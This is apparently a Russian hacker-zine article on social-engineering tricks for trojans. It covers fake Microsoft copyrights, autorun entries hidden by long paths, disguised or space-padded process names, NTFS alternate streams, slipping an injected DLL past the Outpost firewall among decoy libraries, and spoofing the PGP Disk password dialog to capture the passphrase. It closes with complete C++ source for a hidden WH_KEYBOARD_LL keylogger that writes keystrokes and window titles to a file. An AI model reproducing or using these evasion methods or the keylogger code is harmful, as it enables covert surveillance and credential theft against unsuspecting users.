Итак продолжаем говорить о всяком бреде, который заслуживает внимания,
но не заслуживает статьи. Сегодня в номере:
Что бы можно было сразу не читать, а написать
что это фсё лол и настоящие пацаны такой хернёй
не маются - написанно о длинных именах файлов
и хуке WH_KEYBOARD_LL
Социальная инижинерия в вирусах и троянах Сколько статей начинаются фразой по типу:
В большинстве случаев это действительно
так, 99% троянов до сих пор загружаются через
HKLM/Run, и для скрытности имеют названия вроде
WinLoader32.exe. Глядя на это мне просто смешно
становиться. Это дело нужно срочно исправлять
А теперь давайте подумаем так ли плоха ситуация
;) И насколько актуально использование социальной
инжинерии в вирмекинге сегодня. Итак погнали:
Исполнияемые файлы Почему то многие брезгуют оставлять в файлах
копирайты.... нет, конечно не свои... оставляйте
копирайты микрософт ;) золотое правило, которое
написанно во всех учебниках по администрированию
- если ты не знаешь что делает эта штука, то
лучше её не трогать, на удивление работает
до сих пор. Поэтому никогда не брезгуйте лишний
раз подчеркнуть, что этот файл поделка © Microsoft
Corporation:
Размер файла от этого значительно не увеличится
- я например пересобрал только что одного троя
- из 28 кб вышло 32 кб, зато значимость вашей
проги в системе намного увеличится ;)
Автозагрузка
Чем пользуется большинство пользователей
и администраторов для просмотра списка автозагрузки
? Ага msconfig (кто ходил на Technet посвящённый
борьбе со злонамеренным кодом помнит что именно
эту тулзу советовали в мс ;) В чём косяк этой
чудестной программы ? А в том что это диалоговое
окно - которое не поддаётся ресайзу - те размер
у него фиксированный - поэтому в таблице в
графе команда не всегда видна целиком команда.
Как можно это использовать ?
Заменяем просто путь на свой - не изменяя
названия. Многие вирусы регистрируются в автозагрузке
под своим именем - что не правильно. Например
найдите самую длинную строку в реестре - и
измените её. Заодно путь для загрузки вируса
может быть разным. В принципе для пущей маскировки
можно и переписать оригинальный файл полностью
своим телом, а потом подгружать оригинальный
файл при запуске.
Процессы
Здесь у нас классика и два варианта:
-
назвать свой файл типа svchost.exe или
explorer.exe
-
назвать свой файл именем с большим числом
пробелов - например
taskmgr.exe virus.exe
Соглашусь - отображается не очень красиво
- однако можно воспользоваться более
хитрым подходм - если известна версия
ос, куда собираемся инсталировать нашу
тулзу - то можно назваться например для
русской XP:
Бездействие системы virus.exe
Это будет отображаться уже как-то так:
Однако всё равно остаётся троеточие
и PID ессно не равен 0.
Файловая система
Сейчас уже никто не помнит какие точно файлы
должны быть в директориях, сколько у него свободного
места на жёстком диске. Поэтому невидимость
в файлововй системе - это просто записать свои
файлы куда-нить подальше в директорию винды
или system32. При желании можно использовать
альтернативные потоки NTFS для сохранения своих
данных. При этом лучше использовать директории
для сохранения своих данных. Firewall
Тк обзор у нас короткие - остановим внимание
на наиболее популярном фаере - Outpost. Какой
метод для его обхода наиболее универсален ?
На самом деле метод СИ =) и внедрение dll библиотеки
;) Как же так , ведь аутпост с лёгкостью отлавливает
внедрение ? Однако не продуманный интерфейс
позволит нам внедрить библиотеку так что бы
это было максимально незаметно. Для этого надо
подгрузить помимо своей библиотеки ещё штук
20-30 других библиотек. Тогда окно предупреждения
будет выглядеть как-то так:
Согласитесь отловить тут нашу библиотеку
скорее всего будет тяжело. Да и запарит бедного
юзера просматривать столько библиотек ... особенно
если в их копирайтах стоит микрософт ;)
PGP Disk
Итак теперь пришло время разобраться с прикладными
программами. Для примера возьмём тулзу PGP
8-ой версии (пришлось недавно поисследовать
эту прогру - вот и выбрал её в качестве подопытного
кролика=) ... Так вот пусть нам надо достать
пасс от этой штуки, не прибегая к кейлогерам.
Окно для ввода пароля выглядит лаконично:
В случае если пароль не правильный окошко
делает несколько нервных телодвижений и превращается
в такое:
Ессно даже если был введён правильный пароль
ничто нам не мешает подставить это окошко -
так что бы подопытный представил ошибку. После
повторного ввода пароля в нашу программу окно
закрывает - но подопытный и не подозревает
что он ввёл правильный пароль ещё в первый
раз. Вообщем простой способ подмены окон для
ввода пароля представляет собой эффективную
штуку и по сей день...
Итого...
Кто-то скажет - да я всегда дизамлю библиотеки,
да я всегда всё проверяю, да меня на такую
хрень не купишь, да я ваще сижу под ликсом
и мне пох, да я ещё много чего....ну что ж
наши поздравления, однако помимо вас в мире
есть ещё куча пользователей,в том числе корпаративных,
мощности чьих компьютеров до сих пор простаивают
за зря - а ведь их было бы можно использоать
с большей пользой для общества =)
Итак подведём итог - чего же мы добились
- и почему возникают такие проблемы. Главный
косяк - непродуманный интерфейс программ. В
случае msconfig и Outpost (пример с dll самый
яркий - но в аутпосте полно всяких убогостей
в интерфейсе, которые превращют этот солидный
фаер в тулзу с ограниченными возможностями)
- это диалоги, размер которых нельзя их менить
- и следовательно снижается область в которую
можно поместить полезную информацию. В случае
стандартного файлового менеджера - ака Explorer
- невозможно просмаривать альтернативные потоки
NTFS (если они есть) - соответвенно не правильно
отображаются размеры файлов. В случае менеджеров
задач назвать интерфейс не продуманным нельзя,
однако то что они отображают кучу пробелов
в имени никак нельзя назвать хорошей практикой
- луше бы если б пробелы просто вырезались
из имён. Ну и в случае прикладых программ,
в роли которых у нас выступил PGP - это то
что нету сообщения на пол экрана, о том что
пароль введён правильно.
Если следовать этим простым правилам - то
вы в итоге получите лёгкий, быстрый, переносимый
и совместимый (в том числе с будущими версиями),
а главное обладающей некоторой незаметностью
в системе софт. Ну и кроме того для защиты
от большинства пользователей можно просто забить
на эти вещи - если вы собираетесь разослать
письмо с признанием в любви в виде атача.exe
- то успех вам гарантированн в любом случае
;)
Простой keylogger
Прога ставит хук WH_KEYBOARD_LL и соответвенно не требует dll. Кароче обычная
лабуда - может кому будет и полезно ... кто ещё не в курсе...
// klog.cpp : Defines the entry point for the application.
//
// обязательная строчка ;)
#define _WIN32_WINNT 0x0400
#include <windows.h>
#define MAX_LOADSTRING 100
// Global Variables:
HINSTANCE hInst;
TCHAR szTitle[MAX_LOADSTRING];
TCHAR szWindowClass[MAX_LOADSTRING];
// Хэндл хука
HHOOK KeyHook;
// Активное окно
HWND ActiveWnd;
//процедура для обрабоки сообщений
LRESULT CALLBACK LowLevelKeyboardProc (INT nCode, WPARAM wParam, LPARAM lParam);
// Foward declarations of functions included in this code module:
ATOM MyRegisterClass(HINSTANCE hInstance);
BOOL InitInstance(HINSTANCE, int);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
//стандартная херня для создания окна:
MSG msg;
// Initialize global strings
wsprintf (szTitle, "MaZaFaKa.Ru Keylogger");
wsprintf (szWindowClass, "KeyLoggerWnd");
MyRegisterClass(hInstance);
// Perform application initialization:
// невидимое окно:
if(!InitInstance (hInstance, SW_HIDE))
{
return FALSE;
}
// Создаём хук
KeyHook = SetWindowsHookEx (WH_KEYBOARD_LL, LowLevelKeyboardProc, GetModuleHandle(NULL),0);
if(KeyHook == NULL){
// обшибочка вышла
return 1;
}
// Main message loop:
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
}
ATOM MyRegisterClass(HINSTANCE hInstance)
{
WNDCLASSEX wcex;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.style = CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = (WNDPROC)WndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance = hInstance;
wcex.hIcon = NULL;
wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName = NULL;
wcex.lpszClassName = szWindowClass;
wcex.hIconSm = NULL;
return RegisterClassEx(&wcex);
}
BOOL InitInstance(HINSTANCE hInstance, intnCmdShow)
{
HWND hWnd;
hInst = hInstance; // Store instance handle in our global variable
hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
if(!hWnd)
{
return FALSE;
}
ShowWindow(hWnd, nCmdShow);
UpdateWindow(hWnd);
return TRUE;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_COMMAND:
break;
case WM_DESTROY:
// перед выходом убиваем хук:
UnhookWindowsHookEx (KeyHook);
PostQuitMessage(0);
break;
default :
return DefWindowProc(hWnd, message, wParam, lParam);
}
return 0;
}
LRESULT CALLBACK LowLevelKeyboardProc (INT nCode, WPARAM wParam, LPARAM lParam){
KBDLLHOOKSTRUCT *pkbhs = (KBDLLHOOKSTRUCT *) lParam;
// файловые переменные
HANDLE hFile;
DWORD dwBytesWritten, dwPos;
// текущее окно
HWND hWndA;
char str[MAX_PATH], buf[MAX_PATH];
if(nCode == HC_ACTION && wParam == WM_KEYDOWN) {
// пишем в лог:
hFile = CreateFile ("C:\\mazalog.txt",
GENERIC_WRITE,
0,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hFile != INVALID_HANDLE_VALUE){
dwPos = SetFilePointer (hFile, 0, NULL, FILE_END);
// получаем top окно:
hWndA = GetForegroundWindow ();
if(hWndA != ActiveWnd){
//это новое окошко - надо залогить это событие
GetWindowText (hWndA, str, MAX_PATH);
ActiveWnd = hWndA;
wsprintf (buf, "\n[Window: %s]\n", str);
WriteFile (hFile, buf, strlen (buf), &dwBytesWritten, NULL);
}
// резолвим клавишу:
HKL hkl = GetKeyboardLayout(0);
UINT s = MapVirtualKeyEx(pkbhs->vkCode, 0, hkl);
GetKeyNameText (s<<16, str, MAX_PATH);
// пишем в файл
wsprintf (buf, "%s.", str);
WriteFile (hFile, buf, strlen (buf), &dwBytesWritten, NULL);
CloseHandle (hFile);
}
}
// передаём управление следующему кейлоггеру... ;)
return CallNextHookEx (KeyHook, nCode, wParam, lParam);
}
The end |